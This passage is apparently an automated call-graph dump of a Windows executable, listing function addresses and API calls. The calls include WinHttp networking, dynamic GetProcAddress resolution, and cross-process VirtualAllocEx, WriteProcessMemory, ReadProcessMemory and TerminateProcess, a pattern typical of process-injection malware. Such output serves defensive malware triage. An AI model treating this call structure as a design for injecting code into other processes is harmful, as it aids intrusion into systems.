8560->8565 8561->8151 8562 1400054be SysFreeString 8562->8573 8563 1400054e9 ??2@YAPEAX_K 8568 140005504 SysAllocString SysAllocString 8563->8568 8563->8573 8564->8565 8569 1400057d4 SysFreeString 8565->8569 8570 1400057da ??3@YAXPEAX 8565->8570 8566 1400054d3 ??3@YAXPEAX 8566->8573 8567 1400054cd SysFreeString 8567->8566 8568->8573 8569->8570 8570->8561 8571 14000e580 10 API calls 8571->8573 8572 14000e0c0 memset memcpy 8572->8573 8573->8558 8573->8562 8573->8563 8573->8566 8573->8567 8573->8571 8573->8572 8574 140002880 _vsnwprintf 8573->8574 8575 140007ae0 19 API calls 8573->8575 8576 140003e40 252 API calls 8573->8576 8574->8573 8575->8573 8576->8573 8578 140006c33 gethostname 8577->8578 8582 140006c21 8577->8582 8579 140006c59 getaddrinfo 8578->8579 8578->8582 8579->8582 8580 140006cf5 freeaddrinfo 8581 140006cfe WSACleanup 8580->8581 8581->8151 8582->8580 8582->8581 8584 140004408 8583->8584 8585 14000bd60 18 API calls 8584->8585 8586 140004446 8585->8586 8587 140004858 8586->8587 8590 140004457 8586->8590 8593 14000e0c0 2 API calls 8587->8593 8614 1400046ba 8587->8614 8588 140004833 HeapFree 8589 140004848 8588->8589 8589->8151 8591 14000e0c0 2 API calls 8590->8591 8592 14000448f 8591->8592 8594 140002500 24 API calls 8592->8594 8602 1400048d3 8593->8602 8596 140004520 8594->8596 8595 1400045b2 HeapFree 8597 1400045c7 8595->8597 8596->8595 8596->8597 8600 14000e0c0 2 API calls 8597->8600 8597->8614 8598 140004b0e 8599 140004b26 8598->8599 8601 14000e580 10 API calls 8598->8601 8603 14000e0c0 2 API calls 8599->8603 8599->8614 8612 140004626 8600->8612 8601->8599 8602->8598 8604 140004a9d 8602->8604 8607 14000e0c0 2 API calls 8602->8607 8602->8614 8603->8614 8605 140004aca HeapFree 8604->8605 8606 140004adc 8604->8606 8604->8614 8605->8606 8608 14000e580 10 API calls 8606->8608 8609 140004a53 8607->8609 8610 140004af5 memcpy 8608->8610 8611 14000ce20 11 API calls 8609->8611 8610->8598 8611->8604 8613 14000e0c0 2 API calls 8612->8613 8612->8614 8613->8614 8614->8588 8614->8589 8616 140004c5b 8615->8616 8617 140004c63 ??2@YAPEAX_K 8616->8617 8618 140004d8d 8616->8618 8620 140004c74 8617->8620 8619 140004dc4 8618->8619 8625 140004da0 _time64 8618->8625 8621 140004ddf 8619->8621 8626 140005d00 10 API calls 8619->8626 8624 1400023b0 28 API calls 8620->8624 8622 140004de9 HeapFree 8621->8622 8623 140004dfb 8621->8623 8622->8623 8623->8151 8628 140004cc4 8624->8628 8625->8619 8625->8625 8627 140004dd6 ??3@YAXPEAX 8626->8627 8627->8621 8628->8618 8629 14000e0c0 2 API calls 8628->8629 8630 140004cf9 8629->8630 8631 1400051b0 24 API calls 8630->8631 8632 140004d4a 8631->8632 8633 140005d00 10 API calls 8632->8633 8634 140004d6c ??3@YAXPEAX 8633->8634 8634->8618 8636 14000585c 8635->8636 8654 140005a45 8635->8654 8637 14000e580 10 API calls 8636->8637 8638 140005868 8637->8638 8638->8654 9424 140005ad0 8638->9424 8639 140005a73 freeaddrinfo 8640 140005a79 8639->8640 8641 140005a93 8640->8641 8642 140005a7e HeapFree 8640->8642 8644 140005ab5 WSACleanup 8641->8644 8645 140005aa0 HeapFree 8641->8645 8642->8641 8644->8151 8645->8644 8646 1400058a5 HeapFree 8649 14000587c 8646->8649 8647 1400058cf freeaddrinfo 8647->8649 8648 14000e0c0 memset memcpy 8648->8649 8649->8646 8649->8647 8649->8648 8650 140005906 8649->8650 8651 140002880 _vsnwprintf 8649->8651 8652 14000bfe0 11 API calls 8649->8652 8653 1400059b8 getaddrinfo 8649->8653 8649->8654 8650->8151 8651->8649 8652->8649 8653->8649 8654->8639 8654->8640 8659 1400151bf 8655->8659 8656 1400151f2 8658 14000e0c0 2 API calls 8656->8658 8657 14000f310 50 API calls 8657->8659 8660 14001521a 8658->8660 8659->8656 8659->8657 8662 140015309 8659->8662 8661 14000d0f0 16 API calls 8660->8661 8664 14001526b 8661->8664 8662->8151 8663 1400152f4 HeapFree 8663->8662 8665 1400152b4 8664->8665 9442 1400167e0 8664->9442 8665->8662 8665->8663 8666 1400152de HeapFree 8665->8666 8666->8665 8669 140007c01 _wtoi 8668->8669 8670 140007bf4 8668->8670 8671 140007c1b 8669->8671 8670->8168 8672 140007c91 8671->8672 8673 140007c77 8671->8673 8674 140007c39 8671->8674 8672->8168 9666 140009300 8673->9666 8676 140007c5d 8674->8676 8677 140007c3e 8674->8677 9531 1400097f0 8676->9531 8677->8672 9520 140009150 8677->9520 8680 140007c65 8680->8168 8684 14000caf0 11 API calls 8683->8684 8685 140003f09 8684->8685 8686 14000caf0 11 API calls 8685->8686 8687 140003f18 8686->8687 8688 14000caf0 11 API calls 8687->8688 8694 140003f27 8688->8694 8689 140004053 8690 140004091 HeapFree 8689->8690 8691 1400040a6 8689->8691 8690->8691 8692 1400040b3 HeapFree 8691->8692 8693 1400040c8 8691->8693 8692->8693 8695 1400040d5 HeapFree 8693->8695 8696 1400040ea 8693->8696 8694->8689 8697 14000e580 10 API calls 8694->8697 8695->8696 8698 1400040f7 HeapFree 8696->8698 8699 14000410c 8696->8699 8700 140003fde 8697->8700 8698->8699 8699->8151 8700->8689 8701 14000e0c0 2 API calls 8700->8701 8702 140003ffe 8701->8702 8703 140002880 _vsnwprintf 8702->8703 8703->8689 8705 14000e580 10 API calls 8704->8705 8708 14000bd8e 8705->8708 8706 140003663 8724 14000e580 8706->8724 8707 14000bda0 GetModuleFileNameW 8707->8706 8707->8708 8708->8706 8708->8707 8709 14000bebc RtlReAllocateHeap 8708->8709 8710 14000e0c0 2 API calls 8708->8710 8709->8706 8709->8707 8711 14000bded LoadLibraryA 8710->8711 8712 14000e0c0 2 API calls 8711->8712 8713 14000be0c GetProcAddress 8712->8713 8713->8706 8714 14000be2a 8713->8714 8715 14000e0c0 2 API calls 8714->8715 8716 14000be3b GetProcAddress 8715->8716 8716->8706 8717 14000be59 8716->8717 8718 14000e0c0 2 API calls 8717->8718 8719 14000be6a GetProcAddress 8718->8719 8719->8706 8720 14000be84 8719->8720 8721 14000e0c0 2 API calls 8720->8721 8722 14000be95 GetProcAddress 8721->8722 8722->8706 8723 14000beaf GetProcessHeap 8722->8723 8723->8709 8725 14000e5a8 8724->8725 8726 14000e68b 8724->8726 8727 14000e0c0 2 API calls 8725->8727 8728 14000e6a6 RtlAllocateHeap 8726->8728 8729 14000e698 RtlReAllocateHeap 8726->8729 8730 14000e5b9 LoadLibraryA 8727->8730 8731 14000366f 8728->8731 8729->8731 8732 14000e0c0 2 API calls 8730->8732 8731->8093 8731->8112 8733 14000e5d8 GetProcAddress 8732->8733 8734 14000e5f2 8733->8734 8735 14000e5f9 8733->8735 8734->8731 8736 14000e0c0 2 API calls 8735->8736 8737 14000e60a GetProcAddress 8736->8737 8737->8734 8738 14000e624 8737->8738 8739 14000e0c0 2 API calls 8738->8739 8740 14000e635 GetProcAddress 8739->8740 8740->8734 8741 14000e64f 8740->8741 8742 14000e0c0 2 API calls 8741->8742 8743 14000e660 GetProcAddress 8742->8743 8743->8734 8744 14000e67e GetProcessHeap 8743->8744 8744->8726 8748 14000178b 8745->8748 8746 1400011e4 8746->8239 8746->8250 8747 140001922 8790 14000dfe0 8747->8790 8748->8746 8748->8747 8749 14000e580 10 API calls 8748->8749 8751 1400018cf memcpy memcpy 8749->8751 8751->8747 8753 14000e580 10 API calls 8754 140001945 8753->8754 8795 14000e050 8754->8795 8757 14000e050 2 API calls 8758 14000196d 8757->8758 8759 14000e050 2 API calls 8758->8759 8767 1400019c0 8758->8767 8763 140001985 8759->8763 8760 14000e050 2 API calls 8761 1400019d4 8760->8761 8762 14000e050 2 API calls 8761->8762 8764 1400019e8 _time64 _localtime64 8762->8764 8765 14000e050 2 API calls 8763->8765 8766 14000e0c0 2 API calls 8764->8766 8765->8767 8768 140001a25 wcsftime 8766->8768 8767->8760 8770 140001a88 8768->8770 8771 14000e050 2 API calls 8770->8771 8772 140001ab2 8771->8772 8773 140001b30 8772->8773 8774 14000e050 2 API calls 8772->8774 8775 14000e050 2 API calls 8773->8775 8776 140001af4 8774->8776 8777 140001b44 8775->8777 8780 14000e050 2 API calls 8776->8780 8779 14000bd60 18 API calls 8777->8779 8781 140001b54 8779->8781 8780->8773 8782 14000e050 2 API calls 8781->8782 8783 140001b90 HeapFree HeapFree 8782->8783 8783->8746 8785 14000cc9b GetTokenInformation 8784->8785 8786 14000cccd 8784->8786 8785->8786 8786->8239 8788 140001028 SysAllocString 8787->8788 8789 140001048 8787->8789 8788->8789 8789->8281 8791 14000e0c0 2 API calls 8790->8791 8792 14000dffe 8791->8792 8793 14000e580 10 API calls 8792->8793 8794 140001936 8793->8794 8794->8753 8796 14000e0c0 2 API calls 8795->8796 8797 140001959 8796->8797 8797->8757 8799 14000e0c0 2 API calls 8798->8799 8800 14000d459 WinHttpOpen 8799->8800 8802 1400075fe memset memset 8800->8802 8802->8316 8804 14000c0f4 8803->8804 8805 14000e0c0 2 API calls 8804->8805 8806 14000c107 8805->8806 8807 14000e0c0 2 API calls 8806->8807 8808 14000c14e GetProcAddress 8807->8808 8810 14000c174 8808->8810 8811 14000e0c0 2 API calls 8810->8811 8812 14000c23e 8811->8812 8813 14000e0c0 2 API calls 8812->8813 8814 14000c296 8813->8814 8815 14000e580 10 API calls 8814->8815 8816 14000c2d5 8815->8816 8817 14000c368 8816->8817 8818 14000c36a 8816->8818 8819 14000c2ee 8816->8819 8817->8321 8821 14000e0c0 2 API calls 8818->8821 8820 14000e0c0 2 API calls 8819->8820 8822 14000c2fa 8820->8822 8823 14000c376 8821->8823 8854 140002880 8822->8854 8824 140002880 _vsnwprintf 8823->8824 8824->8817 8827 14000e0c0 2 API calls 8826->8827 8828 140014e34 8827->8828 8828->8322 8830 14000d420 3 API calls 8829->8830 8831 14000dc83 GetTickCount 8830->8831 8832 14000deb9 8831->8832 8849 14000dcaf 8831->8849 8833 14000e0c0 2 API calls 8832->8833 8838 14000deeb 8832->8838 8834 14000dee0 8833->8834 8835 14000e580 10 API calls 8834->8835 8835->8838 8836 14000df61 8839 14000df74 8836->8839 8840 14000df6b WinHttpCloseHandle 8836->8840 8837 14000df5b WinHttpCloseHandle 8837->8836 8838->8836 8838->8837 8843 14000df84 8839->8843 8844 14000df7e WinHttpCloseHandle 8839->8844 8840->8839 8841 14000dd24 WinHttpCloseHandle 8842 14000dd2d WinHttpConnect 8841->8842 8842->8849 8845 14000df8e HeapFree 8843->8845 8846 140007704 8843->8846 8844->8843 8845->8846 8846->8328 8846->8333 8847 14000caf0 11 API calls 8847->8849 8848 14000e0c0 memset memcpy 8848->8849 8849->8832 8849->8841 8849->8842 8849->8847 8849->8848 8853 14000de8b HeapFree 8849->8853 8858 14000d630 8849->8858 8873 14000d9e0 8849->8873 8891 14000bf10 8849->8891 8853->8849 8855 14000289c 8854->8855 8856 1400028ae _vsnwprintf 8855->8856 8857 1400028c9 8855->8857 8856->8857 8857->8817 8859 14000d7b8 8858->8859 8860 14000d65f 8858->8860 8861 14000d7c1 WinHttpCloseHandle 8859->8861 8872 14000d7a8 8859->8872 8862 14000d672 WinHttpSetTimeouts 8860->8862 8863 14000d668 WinHttpCloseHandle 8860->8863 8861->8872 8864 14000e0c0 2 API calls 8862->8864 8863->8862 8866 14000d6a6 WinHttpOpenRequest 8864->8866 8866->8859 8867 14000d716 8866->8867 8868 14000d745 WinHttpSendRequest 8867->8868 8869 14000d71b WinHttpSetOption 8867->8869 8868->8859 8870 14000d768 WinHttpReceiveResponse 8868->8870 8869->8859 8869->8868 8870->8859 8871 14000d778 WinHttpQueryHeaders 8870->8871 8871->8859 8871->8872 8872->8849 8874 14000da10 WinHttpQueryDataAvailable 8873->8874 8875 14000dbf6 8874->8875 8887 14000da31 8874->8887 8875->8849 8876 14000db93 RtlReAllocateHeap 8879 14000dbd3 WinHttpReadData 8876->8879 8877 14000e580 10 API calls 8877->8887 8878 14000e0c0 2 API calls 8880 14000da6f LoadLibraryA 8878->8880 8879->8875 8879->8887 8881 14000e0c0 2 API calls 8880->8881 8882 14000da8e GetProcAddress 8881->8882 8882->8887 8883 14000e0c0 2 API calls 8884 14000dad1 GetProcAddress 8883->8884 8884->8887 8885 14000e0c0 2 API calls 8886 14000db14 GetProcAddress 8885->8886 8886->8887 8887->8874 8887->8875 8887->8876 8887->8877 8887->8878 8887->8879 8887->8883 8887->8885 8888 14000e0c0 2 API calls 8887->8888 8889 14000db57 GetProcAddress 8888->8889 8889->8887 8890 14000db86 GetProcessHeap 8889->8890 8890->8876 8892 14000bf54 8891->8892 8893 14000bfa6 8892->8893 8894 14000e580 10 API calls 8892->8894 8893->8849 8895 14000bf67 8894->8895 8895->8893 8896 14000bf96 HeapFree 8895->8896 8896->8893 8901 140002568 8897->8901 8898 140002608 8899 140002628 HeapFree 8898->8899 8900 14000263d 8898->8900 8899->8900 8900->8358 8900->8359 8901->8898 8902 14000e580 10 API calls 8901->8902 8903 1400025b5 8902->8903 8903->8898 8904 140002660 23 API calls 8903->8904 8904->8898 8906 140005d1f SysFreeString 8905->8906 8910 140005d25 8905->8910 8906->8910 8907 140005de2 8946 140001fa0 8907->8946 8909 140005d6c 8911 140005d91 8909->8911 8912 140005d7f HeapFree 8909->8912 8910->8907 8910->8909 8914 140005d4f HeapFree 8910->8914 8915 140005d9a HeapFree 8911->8915 8916 140005dac 8911->8916 8912->8911 8914->8910 8915->8916 8917 140005db5 HeapFree 8916->8917 8918 140005dc7 8916->8918 8917->8918 8918->8907 8919 140005dd0 HeapFree 8918->8919 8919->8907 8921 140002660 23 API calls 8920->8921 8922 1400023e1 8921->8922 8923 1400023f7 8922->8923 8924 140002440 14 API calls 8922->8924 8925 140002401 HeapFree 8923->8925 8926 140002418 8923->8926 8924->8923 8925->8926 8926->8379 8928 14000e0c0 2 API calls 8927->8928 8939 1400051e2 8928->8939 8929 1400052b2 8930 14000bd60 18 API calls 8929->8930 8931 1400053cb 8929->8931 8934 140005357 8930->8934 8933 140005429 8931->8933 8935 1400053e6 SysAllocString 8931->8935 8940 140005396 8931->8940 8932 140005414 HeapFree 8932->8933 8936 1400050be 8933->8936 8937 14000542e HeapFree 8933->8937 8934->8940 8954 14000ce20 8934->8954 8938 1400053f7 8935->8938 8935->8940 8936->8380 8936->8382 8937->8936 8938->8940 8941 140005400 SysFreeString 8938->8941 8939->8929 8942 14000e580 10 API calls 8939->8942 8940->8932 8940->8933 8941->8940 8943 1400052c2 8942->8943 8943->8929 8944 1400052fe HeapFree 8943->8944 8944->8929 8947 14000200d 8946->8947 8951 140001fbf 8946->8951 8948 140002024 HeapFree 8947->8948 8949 140002036 ??3@YAXPEAX 8947->8949 8948->8949 8949->8362 8950 140001fe4 SysFreeString 8950->8951 8951->8947 8951->8950 8952 140001ff3 SysFreeString 8951->8952 8953 140001ff9 ??3@YAXPEAX 8951->8953 8952->8953 8953->8951 8956 14000ce6e 8954->8956 8955 14000ceba 8955->8931 8956->8955 8957 14000e580 10 API calls 8956->8957 8958 14000cecb 8957->8958 8958->8955 8959 14000cef9 HeapFree 8958->8959 8959->8955 8961 14000b3f4 8960->8961 8962 14000b39f 8960->8962 8963 14000b3b6 HeapFree 8962->8963 8964 14000b3c8 8962->8964 8963->8964 8964->8961 8965 14000b3d8 HeapFree 8964->8965 8965->8964 8978 14000d137 8966->8978 8967 14000d166 8968 14000d194 8967->8968 8970 14000d1ae 8967->8970 8971 14000d17d HeapFree 8967->8971 8969 14000d199 HeapFree 8968->8969 8968->8970 8969->8970 8970->8435 8971->8967 8972 14000d3e9 GetLastError 8972->8967 8973 14000e580 10 API calls 8973->8978 8974 14000e0c0 2 API calls 8974->8978 8975 140002880 _vsnwprintf 8975->8978 8976 14000d387 HeapFree 8976->8978 8977 14000d3b1 HeapFree 8977->8978 8978->8967 8978->8972 8978->8973 8978->8974 8978->8975 8978->8976 8978->8977 8980 140002500 24 API calls 8979->8980 8981 14000f148 8980->8981 8982 14000f1b9 8981->8982 9026 14000fca0 8981->9026 8982->8435 8985 14000f161 SysFreeString 8986 14000f167 SysAllocStringLen 8985->8986 8986->8435 9034 14000bfe0 8988->9034 8991 1400166d5 8995 14000e0c0 2 API calls 8991->8995 8992 14001672b 9040 140011210 8992->9040 8993 1400167a2 HeapFree 8994 1400167bc 8993->8994 8994->8435 8998 1400166e9 8995->8998 8998->8993 8998->8994 9003 140016410 9002->9003 9004 14000e580 10 API calls 9003->9004 9005 140016423 9004->9005 9005->8435 9007 14000ef84 9006->9007 9008 14000ef89 9006->9008 9009 140013650 13 API calls 9007->9009 9010 14000ef92 SysFreeString 9008->9010 9011 14000ef98 9008->9011 9009->9008 9010->9011 9012 14000efa4 HeapFree 9011->9012 9013 14000efb6 9011->9013 9012->9013 9014 14000efd1 9013->9014 9015 14000efbf HeapFree 9013->9015 9016 14000efe0 9014->9016 9366 140011110 9014->9366 9015->9014 9018 14000efef 9016->9018 9372 140011190 9016->9372 9019 14000f02a 9018->9019 9023 14000f00d HeapFree 9018->9023 9021 14000f03d HeapFree 9019->9021 9022 14000f04f 9019->9022 9021->9022 9024 14000f05b HeapFree 9022->9024 9025 14000f06d ??3@YAXPEAX 9022->9025 9023->9018 9024->9025 9025->8435 9029 14000fe40 9026->9029 9032 14000fe80 9029->9032 9030 14000e0c0 2 API calls 9030->9032 9031 14000f154 9031->8982 9031->8985 9031->8986 9032->9030 9032->9031 9033 140002440 14 API calls 9032->9033 9033->9032 9035 14000c02c 9034->9035 9036 14000c086 9035->9036 9037 14000e580 10 API calls 9035->9037 9036->8991 9036->8992 9036->8998 9038 14000c03c 9037->9038 9038->9036 9039 14000c076 HeapFree 9038->9039 9039->9036 9041 140011245 9040->9041 9042 14001128f 9040->9042 9045 14000e0c0 2 API calls 9041->9045 9043 140011294 9042->9043 9044 14001130d 9042->9044 9046 14000cc50 3 API calls 9043->9046 9060 1400112ba 9043->9060 9049 14001131e 9044->9049 9055 1400112f1 9044->9055 9048 140011256 9045->9048 9053 14001129e 9046->9053 9051 140011374 TerminateProcess 9048->9051 9052 14001139b 9048->9052 9054 14000e050 2 API calls 9049->9054 9051->9052 9052->8998 9065 140015930 memset 9052->9065 9053->9060 9115 140014740 9053->9115 9054->9048 9064 140011306 9055->9064 9141 140012820 9055->9141 9056 1400112da 9059 14000e050 2 API calls 9056->9059 9059->9048 9060->9055 9133 140012510 9060->9133 9062 14000e050 2 API calls 9062->9048 9064->9052 9064->9062 9066 14001599c 9065->9066 9092 1400159ee 9065->9092 9067 14000caf0 11 API calls 9066->9067 9070 1400159a9 9067->9070 9068 140015b11 9074 140015b67 HeapFree 9068->9074 9075 140015b7c 9068->9075 9069 14000caf0 11 API calls 9072 140015abb 9069->9072 9073 14000caf0 11 API calls 9070->9073 9071 14000bd60 18 API calls 9071->9068 9077 14000bfe0 11 API calls 9072->9077 9091 140015ad2 9072->9091 9076 1400159bb 9073->9076 9074->9075 9078 140015b81 HeapFree 9075->9078 9079 140015b96 9075->9079 9080 14000bfe0 11 API calls 9076->9080 9077->9091 9078->9079 9081 140015bb5 9079->9081 9082 140015ba0 HeapFree 9079->9082 9083 1400159d4 9080->9083 9084 140015bd4 9081->9084 9085 140015bbf HeapFree 9081->9085 9082->9081 9083->9068 9086 14000bfe0 11 API calls 9083->9086 9087 140015bd9 HeapFree 9084->9087 9088 140015bee 9084->9088 9085->9084 9086->9092 9087->9088 9089 140015bf3 HeapFree 9088->9089 9090 140015c08 9088->9090 9089->9090 9090->8998 9093 140011c80 9090->9093 9091->9068 9091->9071 9092->9068 9092->9069 9092->9091 9094 140011cbe 9093->9094 9095 140011cf0 9094->9095 9099 140013b50 2 API calls 9094->9099 9106 140011ed7 9094->9106 9096 140011d13 9095->9096 9097 140013b50 2 API calls 9095->9097 9095->9106 9098 140011d41 9096->9098 9100 140013b50 2 API calls 9096->9100 9096->9106 9097->9096 9101 140011e03 9098->9101 9103 140013b50 2 API calls 9098->9103 9098->9106 9099->9095 9100->9098 9102 140013800 13 API calls 9101->9102 9104 140011e5e 9102->9104 9110 140011d73 9103->9110 9105 140011e8b 9104->9105 9104->9106 9255 140013b00 ReadProcessMemory 9104->9255 9257 140014000 9105->9257 9106->8998 9110->9101 9110->9106 9112 140013b50 2 API calls 9110->9112 9113 140011de2 9112->9113 9113->9101 9114 140011dee HeapFree 9113->9114 9114->9101 9116 140014790 9115->9116 9117 14000e0c0 2 API calls 9116->9117 9118 1400147b2 9117->9118 9119 14000e580 10 API calls 9118->9119 9120 140014804 9118->9120 9125 1400148c4 9119->9125 9121 140014859 HeapFree 9120->9121 9122 14001486e 9120->9122 9121->9122 9123 140014873 HeapFree 9122->9123 9124 140014888 9122->9124 9123->9124 9124->9060 9125->9120 9189 140014540 9125->9189 9128 140014983 GetLastError 9128->9120 9129 140014992 9128->9129 9130 14000e580 10 API calls 9129->9130 9131 14001499f 9130->9131 9131->9120 9132 14000e0c0 2 API calls 9131->9132 9132->9120 9134 140012546 9133->9134 9135 14000e0c0 2 API calls 9134->9135 9136 14001256c 9135->9136 9137 1400112d6 9136->9137 9138 14000e580 10 API calls 9136->9138 9137->9055 9137->9056 9140 1400125f7 9138->9140 9139 1400126d3 HeapFree 9139->9137 9140->9137 9140->9139 9142 14001285b memset 9141->9142 9144 140011343 9141->9144 9146 14001288b 9142->9146 9143 140012bbf 9143->9144 9145 140012df5 VirtualFreeEx 9143->9145 9144->9064 9165 1400113e0 9144->9165 9145->9144 9146->9143 9147 14000e0c0 2 API calls 9146->9147 9148 140012a4a 9147->9148 9149 14000e0c0 2 API calls 9148->9149 9150 140012aae GetProcAddress 9149->9150 9151 14000e0c0 2 API calls 9150->9151 9152 140012ad1 GetProcAddress 9151->9152 9153 14000e0c0 2 API calls 9152->9153 9154 140012af4 GetProcAddress 9153->9154 9155 14000e0c0 2 API calls 9154->9155 9156 140012b17 GetProcAddress 9155->9156 9157 14000e0c0 2 API calls 9156->9157 9158 140012b3a GetProcAddress 9157->9158 9159 14000e0c0 2 API calls 9158->9159 9160 140012b5d GetProcAddress 9159->9160 9161 14000e0c0 2 API calls 9160->9161 9162 140012b80 GetProcAddress 9161->9162 9163 14000e0c0 2 API calls 9162->9163 9164 140012ba3 GetProcAddress 9163->9164 9164->9143 9166 14001166a 9165->9166 9171 140011412 9165->9171 9166->9064 9167 14001161e 9168 140011652 9167->9168 9204 140013650 9167->9204 9168->9166 9170 140011657 HeapFree 9168->9170 9170->9166 9171->9167 9172 14001149e 9171->9172 9173 14001148d GetLastError 9171->9173 9172->9167 9202 140013ab0 WriteProcessMemory 9172->9202 9173->9167 9173->9172 9175 14000e580 10 API calls 9176 1400115c9 memset 9175->9176 9177 140013ab0 WriteProcessMemory 9176->9177 9178 14001151f 9177->9178 9178->9167 9178->9175 9180 140013ab0 WriteProcessMemory 9178->9180 9181 1400116a3 9178->9181 9180->9178 9181->9167 9188 14001195a 9181->9188 9208 1400130c0 9181->9208 9225 1400132c0 9181->9225 9184 140011b37 9184->9167 9236 140013070 9184->9236 9185 14000e0c0 2 API calls 9186 140011a3c lstrcmp 9185->9186 9186->9188 9187 14000e0c0 memset memcpy 9187->9188 9188->9167 9188->9184 9188->9185 9188->9187 9190 14001456e 9189->9190 9193 14001463a 9189->9193 9191 14000e0c0 2 API calls 9190->9191 9192 14001457f 9191->9192 9192->9193 9194 14000e0c0 2 API calls 9192->9194 9193->9120 9193->9128 9193->9131 9195 1400145ae GetProcAddress 9194->9195 9196 14000e0c0 2 API calls 9195->9196 9197 1400145d4 GetProcAddress 9196->9197 9198 14000e0c0 2 API calls 9197->9198 9199 1400145fa GetProcAddress 9198->9199 9200 14000e0c0 2 API calls 9199->9200 9201 140014620 GetProcAddress 9200->9201 9201->9193 9203 140013ae0 9202->9203 9203->9178 9205 14001366a 9204->9205 9207 1400136a2 9204->9207 9239 140013800 9205->9239 9207->9168 9209 14000e0c0 2 API calls 9208->9209 9210 1400130f6 9209->9210 9211 14000e0c0 2 API calls 9210->9211 9212 14001314c GetProcAddress 9211->9212 9214 140013178 MultiByteToWideChar 9212->9214 9215 140013274 9212->9215 9214->9215 9216 1400131ad 9214->9216 9215->9181 9217 14000e580 10 API calls 9216->9217 9218 1400131c2 MultiByteToWideChar 9217->9218 9219 14001323a 9218->9219 9220 1400131eb 9218->9220 9219->9215 9221 14001325f HeapFree 9219->9221 9249 140013b50 9220->9249 9221->9215 9224 140013800 13 API calls 9224->9219 9226 14000e0c0 2 API calls 9225->9226 9227 1400132f9 9226->9227 9228 14000e0c0 2 API calls 9227->9228 9229 14001334c GetProcAddress 9228->9229 9231 140013378 9229->9231 9232 1400133d0 9229->9232 9233 1400133a5 9231->9233 9235 140013b50 2 API calls 9231->9235 9232->9181 9233->9232 9234 140013800 13 API calls 9233->9234 9234->9232 9235->9233 9237 140013800 13 API calls 9236->9237 9238 1400130af 9237->9238 9238->9167 9240 140013857 9239->9240 9241 140013a92 9240->9241 9242 14000e580 10 API calls 9240->9242 9241->9207 9244 14001389b 9242->9244 9243 140013a68 9243->9207 9244->9243 9244->9244 9245 140013a53 HeapFree 9244->9245 9246 140013908 WriteProcessMemory 9244->9246 9245->9243 9247 140013a32 VirtualFreeEx 9246->9247 9248 14001393d 9246->9248 9247->9245 9248->9247 9250 140013b8a 9249->9250 9251 140013b92 WriteProcessMemory 9250->9251 9254 140013214 9250->9254 9252 140013bc3 9251->9252 9253 140013bcf VirtualFreeEx 9251->9253 9252->9253 9252->9254 9253->9254 9254->9219 9254->9224 9256 140013b30 9255->9256 9256->9105 9278 14000f310 9257->9278 9259 140011ecb 9259->9106 9262 140013cd0 9259->9262 9260 140014017 9260->9259 9306 140014080 9260->9306 9263 140013fe5 9262->9263 9275 140013d03 9262->9275 9263->9106 9264 140013d32 lstrlenW 9264->9275 9265 140013d1b HeapFree 9265->9264 9266 140013f91 9268 140013fb6 HeapFree 9266->9268 9269 140013fcb 9266->9269 9267 14000e580 10 API calls 9267->9275 9268->9269 9269->9263 9270 140013fd0 HeapFree 9269->9270 9270->9263 9271 140013dec HeapFree 9271->9275 9272 140013e1a HeapFree 9272->9275 9273 140013eb7 HeapFree 9273->9275 9274 140011fe0 18 API calls 9274->9275 9275->9264 9275->9265 9275->9266 9275->9267 9275->9271 9275->9272 9275->9273 9275->9274 9276 140013800 13 API calls 9275->9276 9277 140013f5e HeapFree 9276->9277 9277->9275 9280 14000f39c 9278->9280 9279 14000e0c0 2 API calls 9281 14000f3fc 9279->9281 9280->9279 9282 14000e0c0 2 API calls 9281->9282 9295 14000f81b 9281->9295 9283 14000f47b 9282->9283 9288 140002880 _vsnwprintf 9283->9288 9284 14000f82a HeapFree 9285 14000f83c 9284->9285 9286 14000f861 HeapFree 9285->9286 9287 14000f876 9285->9287 9286->9287 9289 14000f883 HeapFree 9287->9289 9290 14000f898 9287->9290 9303 14000f4cc 9288->9303 9289->9290 9290->9260 9291 14000f4eb HeapFree 9291->9303 9292 14000f50d HeapFree 9292->9303 9293 14000e0c0 2 API calls 9293->9303 9294 140002880 _vsnwprintf 9294->9303 9295->9284 9295->9285 9296 14000f5d2 GetFileTime 9296->9303 9297 14000f637 _time64 9298 14000f65c _time64 9297->9298 9297->9303 9298->9303 9299 14000f69d HeapFree 9299->9303 9300 14000caf0 11 API calls 9300->9303 9301 14000f700 Sleep 9301->9303 9302 140002660 23 API calls 9302->9303 9303->9285 9303->9291 9303->9292 9303->9293 9303->9294 9303->9295 9303->9296 9303->9297 9303->9299 9303->9300 9303->9301 9303->9302 9304 14000f7d5 _time64 9303->9304 9305 140014080 38 API calls 9303->9305 9304->9303 9305->9303 9307 14001409f 9306->9307 9308 14000e0c0 2 API calls 9307->9308 9309 14001416f 9308->9309 9310 1400144fe 9309->9310 9311 14000e0c0 2 API calls 9309->9311 9310->9260 9312 1400141ce 9311->9312 9313 140002880 _vsnwprintf 9312->9313 9314 14001421e 9313->9314 9314->9310 9315 14000e0c0 2 API calls 9314->9315 9316 140014236 9315->9316 9317 140002880 _vsnwprintf 9316->9317 9320 14001428a 9317->9320 9318 1400143d9 9319 14001440c HeapFree 9318->9319 9321 140014421 9318->9321 9319->9321 9320->9310 9320->9318 9323 14000e580 10 API calls 9320->9323 9321->9310 9322 1400144c3 9321->9322 9325 14000bfe0 11 API calls 9321->9325 9324 1400144cf HeapFree 9322->9324 9326 14001437a 9323->9326 9324->9310 9327 1400144e9 HeapFree 9324->9327 9328 14001445b 9325->9328 9326->9318 9329 140014382 ReadFile 9326->9329 9327->9310 9328->9324 9335 140011fe0 9328->9335 9329->9318 9330 1400143ad 9329->9330 9331 140002660 23 API calls 9330->9331 9331->9318 9336 140012399 9335->9336 9337 14001202b 9335->9337 9336->9324 9361 1400123d0 9336->9361 9338 140012054 9337->9338 9343 140013b50 2 API calls 9337->9343 9339 140012084 9338->9339 9340 140013b50 2 API calls 9338->9340 9347 1400121c2 9338->9347 9341 1400120b2 9339->9341 9344 140013b50 2 API calls 9339->9344 9339->9347 9340->9339 9342 1400120f4 VirtualAllocEx 9341->9342 9345 140013b50 2 API calls 9341->9345 9341->9347 9346 14001212b 9342->9346 9342->9347 9343->9338 9344->9341 9348 1400120e8 9345->9348 9349 140013800 13 API calls 9346->9349 9347->9336 9351 14001237f HeapFree 9347->9351 9348->9342 9348->9347 9350 140012191 9349->9350 9350->9347 9352 140013b00 ReadProcessMemory 9350->9352 9351->9336 9353 1400121be 9352->9353 9353->9347 9354 140013b00 ReadProcessMemory 9353->9354 9355 1400121e6 9354->9355 9355->9347 9356 14000e580 10 API calls 9355->9356 9357 14001225a 9356->9357 9357->9347 9358 